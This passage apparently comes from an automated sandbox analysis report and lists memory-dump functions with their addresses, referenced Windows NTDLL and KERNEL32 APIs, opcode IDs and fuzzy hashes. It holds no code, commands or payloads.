                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 441bfac5aedf11e84b24dd1c40839cea9eb3215cad013bdc22c82de40beb5743
                                                                          • Instruction ID: 0fd24ef588127f0e57f4a8fc05c512de8c35567043586c23ac1f0bf54e117994
                                                                          • Opcode Fuzzy Hash: 441bfac5aedf11e84b24dd1c40839cea9eb3215cad013bdc22c82de40beb5743
                                                                          • Instruction Fuzzy Hash: AB421574A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340DB359E86CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0DFE, Relevance: 6.5, APIs: 4, Instructions: 546libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 5d99680bc7577eadce22942d5cedf640c4df2827021b8b018cba1dcbd6d956a0
                                                                          • Instruction ID: 44ca9cf8490deffc4d504b92d4b362efd32233006585aaa8acca7e2e262094fb
                                                                          • Opcode Fuzzy Hash: 5d99680bc7577eadce22942d5cedf640c4df2827021b8b018cba1dcbd6d956a0
                                                                          • Instruction Fuzzy Hash: 80422574A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3350CB359E86CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0E45, Relevance: 6.5, APIs: 4, Instructions: 539libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: f7de72d445d26b84f193776fdc13a92c2817a489a8d5f7e5e0f44f5066867138
                                                                          • Instruction ID: 449c255257908a86b60dbcb5f2e1a04a62d14587a225272f96db42b65bb7a697
                                                                          • Opcode Fuzzy Hash: f7de72d445d26b84f193776fdc13a92c2817a489a8d5f7e5e0f44f5066867138
                                                                          • Instruction Fuzzy Hash: 68422574A05228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340CB359E86CF52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0E8C, Relevance: 6.5, APIs: 4, Instructions: 532libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 15d6d7fd3adccb36c0e7a78ed98e95fe17c61d84b2a76a691468fca53981509e
                                                                          • Instruction ID: 5f0127e957a3c2a4791e266990502ccc128c9413687b3a2c7a816cacd6e59782
                                                                          • Opcode Fuzzy Hash: 15d6d7fd3adccb36c0e7a78ed98e95fe17c61d84b2a76a691468fca53981509e
                                                                          • Instruction Fuzzy Hash: A3322574A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340CB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0ED3, Relevance: 6.5, APIs: 4, Instructions: 525libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 6c695c5ad3ced4e8a7174632e584c574281791a10e65b4db5e7893cfa759cf71
                                                                          • Instruction ID: dd414052ed22a47199db824de669f797d2eb7b5759b937499f7888c992531f28
                                                                          • Opcode Fuzzy Hash: 6c695c5ad3ced4e8a7174632e584c574281791a10e65b4db5e7893cfa759cf71
                                                                          • Instruction Fuzzy Hash: E8322574A05228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340CB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0F1A, Relevance: 6.5, APIs: 4, Instructions: 518libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 9a75c6b47ad410160c1e51429357478fa71d765648a1d20beed95e0a9e984e75
                                                                          • Instruction ID: 8627eb7be8ca4600dc2179b9b3039fceaa365e125ea836bfe42b06fd9d8e7c04
                                                                          • Opcode Fuzzy Hash: 9a75c6b47ad410160c1e51429357478fa71d765648a1d20beed95e0a9e984e75
                                                                          • Instruction Fuzzy Hash: 53322574A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340CB399E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0F61, Relevance: 6.5, APIs: 4, Instructions: 511libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: c679fa38c99f39e85b8ea7a8040421298ae90eb3db71617989eb9d850e192e25
                                                                          • Instruction ID: 9186a504e7708d284c5c863a46642ff16967e59962873d102a44fcf6ebb7ff3d
                                                                          • Opcode Fuzzy Hash: c679fa38c99f39e85b8ea7a8040421298ae90eb3db71617989eb9d850e192e25
                                                                          • Instruction Fuzzy Hash: 18323574A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340CB399E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A0FBE, Relevance: 6.5, APIs: 4, Instructions: 500libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 54caa449f43b721fdd84f44e4bfbbb2905d1b3bb16de013102152d136e4dd602
                                                                          • Instruction ID: d47a5daff671c3d46af2312281deb8ed277a045b387f20fa352118493648463e
                                                                          • Opcode Fuzzy Hash: 54caa449f43b721fdd84f44e4bfbbb2905d1b3bb16de013102152d136e4dd602
                                                                          • Instruction Fuzzy Hash: DD322574A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340DB399E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A1005, Relevance: 6.5, APIs: 4, Instructions: 493libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 340b751e9345d2056f587bd8c80702a677cd0de350f8adc5c18f624a86b7a67d
                                                                          • Instruction ID: c80819b0485d3f88631eeeeb7b1f64d21f36086ad99319fc0c34efe7cc60c65b
                                                                          • Opcode Fuzzy Hash: 340b751e9345d2056f587bd8c80702a677cd0de350f8adc5c18f624a86b7a67d
                                                                          • Instruction Fuzzy Hash: 1B323674A04228CFCB25EF74C8987ADB7B6BF89245F1081EAD549A3340DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A104C, Relevance: 6.5, APIs: 4, Instructions: 486libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 97696e94f767baa6d970b8fbf1c0ab0d376714ef6d4f1f390ab5e3f3656a83f1
                                                                          • Instruction ID: 651b5041bf4c16d7315cf9f44980709eede0696a4e9f708e88a83a15a66aff92
                                                                          • Opcode Fuzzy Hash: 97696e94f767baa6d970b8fbf1c0ab0d376714ef6d4f1f390ab5e3f3656a83f1
                                                                          • Instruction Fuzzy Hash: 19223674A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340DB399E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A1093, Relevance: 6.5, APIs: 4, Instructions: 479libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 76e8ae216f774f4e17c753ed1feb3904107ef7763627d7ff1115b4f88f4d546c
                                                                          • Instruction ID: 116c199475d32b676e0bd9ad918616f44cebba12b099bd5d518d6772031b33ff
                                                                          • Opcode Fuzzy Hash: 76e8ae216f774f4e17c753ed1feb3904107ef7763627d7ff1115b4f88f4d546c
                                                                          • Instruction Fuzzy Hash: F0223674A04228CFCB25DF74C8987ADB7B6BF89245F1081EAD549A3340DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A10DA, Relevance: 6.5, APIs: 4, Instructions: 470libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 950b3d510f66eb51682d27681a0a8b6db50b3f6a4dd85337c434b9cb78418ff5
                                                                          • Instruction ID: d37573649648fbb0807597c15808b000fa92fb5d4655fd5acd3543abe9bfc00c
                                                                          • Opcode Fuzzy Hash: 950b3d510f66eb51682d27681a0a8b6db50b3f6a4dd85337c434b9cb78418ff5
                                                                          • Instruction Fuzzy Hash: 8E224674A04228CFCB25EF34C8987ADB7B6BF89245F1081EAD549A3340DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A1118, Relevance: 6.5, APIs: 4, Instructions: 465libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: c6073984a40b98d35c97b3870100f93db64e04c1ff8cbde9c1c7abbb9f12be00
                                                                          • Instruction ID: 18e41a0765bc5f0b6ddc293d169bca836c288c76422bcf1e8120518d56cfc234
                                                                          • Opcode Fuzzy Hash: c6073984a40b98d35c97b3870100f93db64e04c1ff8cbde9c1c7abbb9f12be00
                                                                          • Instruction Fuzzy Hash: 87225674A04229CFCB25EF34C8987ADB7B6BF89245F1081EAD549A3340DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A115F, Relevance: 6.5, APIs: 4, Instructions: 458libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: f2af627951749a6bcef26320c4e25896ea77e10aa39cc4af6f560c7e26c89ca6
                                                                          • Instruction ID: 2c925cbaa2822cfe235968d2e88adf55b478a18f12cb84e1f66774ec4bf8fae0
                                                                          • Opcode Fuzzy Hash: f2af627951749a6bcef26320c4e25896ea77e10aa39cc4af6f560c7e26c89ca6
                                                                          • Instruction Fuzzy Hash: C8225674A04229CFCB25EF34C8987ADB7B6BF89245F1081EAD549A3340DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A11A6, Relevance: 6.5, APIs: 4, Instructions: 451libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: d9e40e80e427d31ca0218d7bc62ffaa3d1971089b22e288e13569d744b464fb3
                                                                          • Instruction ID: 2598660169f5dd2938d55b81810f98dd38aeec373625458feffdecad5e68eda7
                                                                          • Opcode Fuzzy Hash: d9e40e80e427d31ca0218d7bc62ffaa3d1971089b22e288e13569d744b464fb3
                                                                          • Instruction Fuzzy Hash: E8124674A04229CFCB25EF74C8987ADB7B6BF88245F1081EAD549A3340DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A11ED, Relevance: 6.4, APIs: 4, Instructions: 444libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A1216
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 3549e47ae7d71ae9512d9e2e107151cd97e176c73d856af29f11778350d859dd
                                                                          • Instruction ID: 16be01e4189fe32bfeb05909cde32d79063be7d96671d060983f4c49131145ad
                                                                          • Opcode Fuzzy Hash: 3549e47ae7d71ae9512d9e2e107151cd97e176c73d856af29f11778350d859dd
                                                                          • Instruction Fuzzy Hash: BF124674A04229CFCB25EF74C8987ADB7B6BF88245F1081EAD549A3340DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE6B1F, Relevance: 6.1, APIs: 4, Instructions: 141threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 1DAE6BB0
                                                                          • GetCurrentThread.KERNEL32 ref: 1DAE6BED
                                                                          • GetCurrentProcess.KERNEL32 ref: 1DAE6C2A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 1DAE6C83
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 8abb31ec16351404fc070b0c68fcf7f53818491024c196b78561d13bdfe88d4d
                                                                          • Instruction ID: 515af6495392e1b181464aa843d8581a10ad8c0cb4dc7b4632560e4cf5e9fac6
                                                                          • Opcode Fuzzy Hash: 8abb31ec16351404fc070b0c68fcf7f53818491024c196b78561d13bdfe88d4d
                                                                          • Instruction Fuzzy Hash: A35168B49047898FDB00CFA9C988BEEBFF0FF89314F14859AD449A7251D7356844CB66
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE6B14, Relevance: 6.1, APIs: 4, Instructions: 137threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 1DAE6BB0
                                                                          • GetCurrentThread.KERNEL32 ref: 1DAE6BED
                                                                          • GetCurrentProcess.KERNEL32 ref: 1DAE6C2A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 1DAE6C83
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 07d1c73e3e1a0a1c0f227400afe5b0cb3ee1ec559ee23924787ea9fbea190ec8
                                                                          • Instruction ID: eebd0db03fdc319ae21c3b3ae6c03eaf403bcc35425c0924b41516d223de57ec
                                                                          • Opcode Fuzzy Hash: 07d1c73e3e1a0a1c0f227400afe5b0cb3ee1ec559ee23924787ea9fbea190ec8
                                                                          • Instruction Fuzzy Hash: 085167B49047488FDB00DFA9C988BEEBFF0EF89314F24885AE009A7251D7756944CF66
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1DAE6B50, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 1DAE6BB0
                                                                          • GetCurrentThread.KERNEL32 ref: 1DAE6BED
                                                                          • GetCurrentProcess.KERNEL32 ref: 1DAE6C2A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 1DAE6C83
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741594320.000000001DAE0000.00000040.00000001.sdmp, Offset: 1DAE0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: b7cfb6e4aa9eaefd8b0d4d5061e764d4e222a1be8b4f20dc242c4f60af490f69
                                                                          • Instruction ID: 79fd0bef361da77b55833d0d030041cef21cb68e2d283ae3622caca6354e0cfc
                                                                          • Opcode Fuzzy Hash: b7cfb6e4aa9eaefd8b0d4d5061e764d4e222a1be8b4f20dc242c4f60af490f69
                                                                          • Instruction Fuzzy Hash: DC5146B4A006498FDB40CFA9C588BAEBBF1FF89314F248459E40AA7350D7756844CF66
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A124D, Relevance: 4.9, APIs: 3, Instructions: 433libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 267267f1ad6d83deec961430b18e44d546929e791ebdf6ae0d140daec4fba0d1
                                                                          • Instruction ID: 4589c3a0200f5314d946d7a6bc14daf0c39d4c53da72159f8fb8f95e4cac1616
                                                                          • Opcode Fuzzy Hash: 267267f1ad6d83deec961430b18e44d546929e791ebdf6ae0d140daec4fba0d1
                                                                          • Instruction Fuzzy Hash: 8A124674A04229CFCB25EF74C8987ADB7B6BF88245F1081EAD549A3340DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A1297, Relevance: 4.9, APIs: 3, Instructions: 426libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: 09ef018b89ba162b2190522402f10121bbf86c0cde349c14b8ec16a15c0cea23
                                                                          • Instruction ID: f6f2caece4402075238455f167326aedbd6bc1cf85face6f396b4c0baf2850a1
                                                                          • Opcode Fuzzy Hash: 09ef018b89ba162b2190522402f10121bbf86c0cde349c14b8ec16a15c0cea23
                                                                          • Instruction Fuzzy Hash: 69124674A04229CFCB24EF74C8987ADB7B6BF88245F1081EAD549A3740DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A12E1, Relevance: 4.9, APIs: 3, Instructions: 419libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A130A
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser$InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2638914809-0
                                                                          • Opcode ID: e76de93edd39b2ca1bcfdbdffe0d929b590c7e42aba18892daad91c7174e0efe
                                                                          • Instruction ID: 6120f2fc16c8054e5ddc4bfb777f4c50d093d4bc2eb2273c57cf172062bb3a02
                                                                          • Opcode Fuzzy Hash: e76de93edd39b2ca1bcfdbdffe0d929b590c7e42aba18892daad91c7174e0efe
                                                                          • Instruction Fuzzy Hash: 46124674A04229CFCB24EF74C8987ADB7B6BF88245F1081EAD549A3740DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A132B, Relevance: 3.4, APIs: 2, Instructions: 412libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                          • String ID:
                                                                          • API String ID: 243558500-0
                                                                          • Opcode ID: 700d5e1cffe3513ba0418d9fa06884de0b31ebc0a931d266247b3911371e7119
                                                                          • Instruction ID: dc8237c7b4900e7648e1c56d9055bae81b758551b9641ca35bdf72f19c6aa8c4
                                                                          • Opcode Fuzzy Hash: 700d5e1cffe3513ba0418d9fa06884de0b31ebc0a931d266247b3911371e7119
                                                                          • Instruction Fuzzy Hash: DF023774A04229CFCB24EF74C8987ADB7B6BF88245F5081E9D549A3340DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A1375, Relevance: 3.4, APIs: 2, Instructions: 405libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LdrInitializeThunk.NTDLL ref: 1D6A14C9
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                          • String ID:
                                                                          • API String ID: 243558500-0
                                                                          • Opcode ID: 52a81263956cb36af2d4190fc7519667188246bd27af98ec1758187624bf5303
                                                                          • Instruction ID: 9100cfb986261607d6d7f582280df6955bdf5e850a1c8162e3c2c5bb275183cf
                                                                          • Opcode Fuzzy Hash: 52a81263956cb36af2d4190fc7519667188246bd27af98ec1758187624bf5303
                                                                          • Instruction Fuzzy Hash: 450237B4A04229CFCB24EF74C8987ADB7B6BF88245F1081E9D549A3340DB359E86CF51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 1D6A1822, Relevance: 1.7, APIs: 1, Instructions: 233COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • KiUserExceptionDispatcher.NTDLL ref: 1D6A184B
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1741150831.000000001D6A0000.00000040.00000001.sdmp, Offset: 1D6A0000, based on PE: false
                                                                          Similarity
                                                                          • API ID: DispatcherExceptionUser
                                                                          • String ID:
                                                                          • API String ID: 6842923-0
                                                                          • Opcode ID: 9d45332e97c0fe3723a768c3aea7aef077f50df4fe86285ec892e84128b24734
